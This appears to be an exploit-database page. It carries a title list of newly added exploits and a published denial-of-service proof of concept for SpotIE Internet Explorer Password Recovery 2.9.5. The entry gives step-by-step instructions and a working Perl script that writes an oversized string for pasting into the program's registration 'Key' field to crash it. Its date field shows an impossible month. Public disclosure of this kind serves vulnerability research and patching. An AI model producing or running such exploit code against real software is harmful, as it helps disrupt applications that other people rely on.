
10 changes to exploits/shellcodes SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service Easy File Sharing Web Server 7.2 - 'New User' Local SEH Overflow ABRT - sosreport Privilege Escalation (Metasploit) Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution YzmCMS 5.3 - 'Host' Header Injection
29 lines
No EOL
894 B
Text
29 lines
No EOL
894 B
Text
# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
|
|
# Date: 2019-20-09
|
|
# Exploit Author: Emilio Revelo
|
|
# Vendor Homepage: http://www.nsauditor.com/
|
|
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
|
|
# Tested on: Windows 10 Pro x64 es
|
|
# Version: 2.9.5
|
|
|
|
# Steps to produce the DoS:
|
|
|
|
# 1.- Run perl script : perl SpotIE.pl
|
|
# 2.- Open SpotIE.txt and copy the content to clipboard
|
|
# 3.- Open SpotIE Internet Explorer Password Recovery
|
|
# 4.- Navigate to Register -> Enter the registration name and key below...
|
|
# 5.- Paste ClipBoard on "Key:"
|
|
# 7.- Ok
|
|
# 8.- Observe the program crash.
|
|
|
|
#!/usr/local/bin/perl
|
|
|
|
use strict;
|
|
use warnings;
|
|
|
|
my $filename = 'SpotIE.txt';
|
|
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
|
|
print $fh "E"x256;
|
|
close $fh;
|
|
print "Done!\n";
|
|
print "File: SpotIE.txt\n" |